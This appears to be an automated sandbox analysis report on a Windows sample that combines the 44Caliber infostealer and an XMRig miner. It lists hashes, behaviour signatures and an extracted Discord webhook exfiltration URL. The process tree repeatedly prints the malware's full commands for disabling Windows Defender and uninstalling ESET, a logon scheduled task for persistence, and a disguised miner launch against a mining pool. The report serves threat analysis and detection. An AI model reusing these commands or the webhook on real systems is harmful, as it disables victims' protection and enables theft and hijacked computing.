Analysis
-
max time kernel
130s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
-
submitted
20-04-2024 16:47
General
-
Target
fd2f11c31192e8efe0eb4b37d1a5e1b6_JaffaCakes118.exe
-
Size
9.5MB
-
MD5
fd2f11c31192e8efe0eb4b37d1a5e1b6
-
SHA1
48b2610a347ae04cd61cd33100715ca5476e1951
-
SHA256
a15c3b6773fa9d8db715f8c557c76c95e8f84db0fa5046ed7a01589bfdc778b5
-
SHA512
39a5e38dfb04b462e167462e78fe9cf018215cd8e9fcc7e1cf67e6ea93f99176af49995ed9c987899f140fe32faeda6757a2e814944b899454e771f183b04afa
-
SSDEEP
196608:0FSJAB+ZcpS+S6SrGTsD2dmmhGlkrwPgZS7rjsn6P44Nm:0FS+Bkc0+Fe6dmracMR7
Malware Config
Extracted
44caliber
https://discord.com/api/webhooks/868513655556292688/7ViWQKXofSCTi8VWoHEcGeQK61RUEBYfnsE72cu6TJnpHYwlgzbrVI5gQn_jpfUMFoS5
Signatures
-
44Caliber
An open source infostealer written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 12 IoCs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 12 IoCs
-
Loads dropped DLL 57 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 24 IoCs
-
Drops file in Windows directory 6 IoCs
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fd2f11c31192e8efe0eb4b37d1a5e1b6_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\fd2f11c31192e8efe0eb4b37d1a5e1b6_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\InterialoaderNOP.exe"C:\Users\Admin\AppData\Local\Temp\InterialoaderNOP.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Interialoader.exe"C:\Users\Admin\AppData\Local\Temp\Interialoader.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableArchiveScanning $true6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableBehaviorMonitoring $true6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableScriptScanning $true6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIOAVProtection $true6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -MAPSReporting Disabled6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WinDefend6⤵
- Launches sc.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Stop-Service WinDefend6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-Service WinDefend -StartupType Disabled6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Uninstall-WindowsFeature -Name Windows-Defender6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\Dism.exeDism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet6⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\76ACC2D2-0A1E-46D0-B7BD-4C5A3C1AB24A\dismhost.exeC:\Users\Admin\AppData\Local\Temp\76ACC2D2-0A1E-46D0-B7BD-4C5A3C1AB24A\dismhost.exe {B76DDC7B-F7F6-4AC6-8DA1-5CAAA1F276F5}7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\Wbem\WMIC.exeWmic Product where name="Eset Security" call uninstall6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableArchiveScanning $true7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableBehaviorMonitoring $true7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableScriptScanning $true7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIOAVProtection $true7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -MAPSReporting Disabled7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend7⤵
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WinDefend7⤵
- Launches sc.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Stop-Service WinDefend7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-Service WinDefend -StartupType Disabled7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Uninstall-WindowsFeature -Name Windows-Defender7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI7⤵
-
C:\Windows\system32\Dism.exeDism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet7⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\A97E8E7A-CC60-4D06-AB89-A53EB1CA37FF\dismhost.exeC:\Users\Admin\AppData\Local\Temp\A97E8E7A-CC60-4D06-AB89-A53EB1CA37FF\dismhost.exe {BC29237B-4301-4195-85DC-6EEDF3FFE4CC}8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\Wbem\WMIC.exeWmic Product where name="Eset Security" call uninstall7⤵
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableArchiveScanning $true7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableBehaviorMonitoring $true7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableScriptScanning $true7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIOAVProtection $true7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -MAPSReporting Disabled7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend7⤵
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WinDefend7⤵
- Launches sc.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Stop-Service WinDefend7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-Service WinDefend -StartupType Disabled7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Uninstall-WindowsFeature -Name Windows-Defender7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI7⤵
-
C:\Windows\system32\Dism.exeDism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet7⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\F2826D5E-1F19-4337-BAA1-698D9672DE24\dismhost.exeC:\Users\Admin\AppData\Local\Temp\F2826D5E-1F19-4337-BAA1-698D9672DE24\dismhost.exe {CE6B9F07-E2E9-4166-A2DE-6FF4FD4247A3}8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\Wbem\WMIC.exeWmic Product where name="Eset Security" call uninstall7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit6⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableArchiveScanning $true8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableBehaviorMonitoring $true8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true8⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6056254 --pass=in --cpu-max-threads-hint=40 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth6⤵
-
C:\Users\Admin\AppData\Local\Temp\Insidious.exe"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe"C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Java\jre-1.8\bin\javaw.exe"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe" org.develnext.jphp.ext.javafx.FXLauncher4⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeC:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M5⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\Config.exe"C:\Users\Admin\AppData\Local\Temp\Config.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestampFilesize
46B
MD53428ed9c25b070074603ab4f590f35de
SHA1cfc41d19ee9112e39d6823fdb241798bd99e0635
SHA256f31551a5972baeb21497b10f20147ca79f337ee83044c335710f9a1dbf131708
SHA5129d061821908f2d74c07b9c7e07cd577afa0721bf8a071ec860a1f64c4c53671ab0a8751ace7d50fc8c545d9137d5eeb618cbebd040b2d155b484c8c31df4473a
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5e6b38b2dfab24af27e6a2ed5b625e92f
SHA1afb73099aa0ea281acb850f5a90bb526eb692240
SHA256bfdcc3782e7cf9974e4f8f1734d25554df7a3234dddf54fdfa838cc381c97bf5
SHA51292eb2e67ad8edfcc15effd2c51424ba1a87316cd7f88a26dc4a7af1043d7b0c1dd0247e67c09531e3fa545b161ede81743409ca5d6bf5be15c45d9dab7df9f45
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5e58749a7a1826f6ea62df1e2ef63a32b
SHA1c0bca21658b8be4f37b71eec9578bfefa44f862d
SHA2560e1f0e684adb40a5d0668df5fed007c9046137d7ae16a1f2f343b139d5f9bc93
SHA5124cf45b2b11ab31e7f67fff286b29d50ed28cd6043091144c5c0f1348b5f5916ed7479cf985595e6f096b586ab93b4b5dce612f688049b8366a2dd91863e98b70
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5aac3a78657a44cff925b1be1b51c3233
SHA187556630dc3520d4c7f30b57a2cca8b7d3ff7dc3
SHA25633a8a37d79970907b16a388d4a179a16e08f97e399c5939effe064d9113fa8ab
SHA5127a8c5f8954dfb5e4ad90b7690a35eec5aea8b62441eb0425da4c225f0de1f7f5b1ff63ddaa1e53a0a2b10eb4ac6cb6c849715bb810b88c428dbe6783688037f1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56f3b96b24f06e2d37a46e43e8b784f56
SHA17be6702c5867f359e913eeeecdd5b76698589295
SHA2568e386afeed28e1d282d9a0294dd2e9402dcb807f7c77aca8426314c20057e720
SHA512d760999531a77a9adf2b4dc019ce3b43ac3a8cad825398b3a09818afe8deaa177d37219a26dd8a432c00c9cff7858efc43cae2375edc996bb0136c92c39c9dfb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5b51dc9e5ec3c97f72b4ca9488bbb4462
SHA15c1e8c0b728cd124edcacefb399bbd5e25b21bd3
SHA256976f9534aa2976c85c2455bdde786a3f55d63aefdd40942eba1223c4c93590db
SHA5120e5aa6cf64c535aefb833e5757b68e1094c87424abe2615a7d7d26b1b31eff358d12e36e75ca57fd690a9919b776600bf4c5c0e5a5df55366ba62238bdf3f280
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD567e8893616f805af2411e2f4a1411b2a
SHA139bf1e1a0ddf46ce7c136972120f512d92827dcd
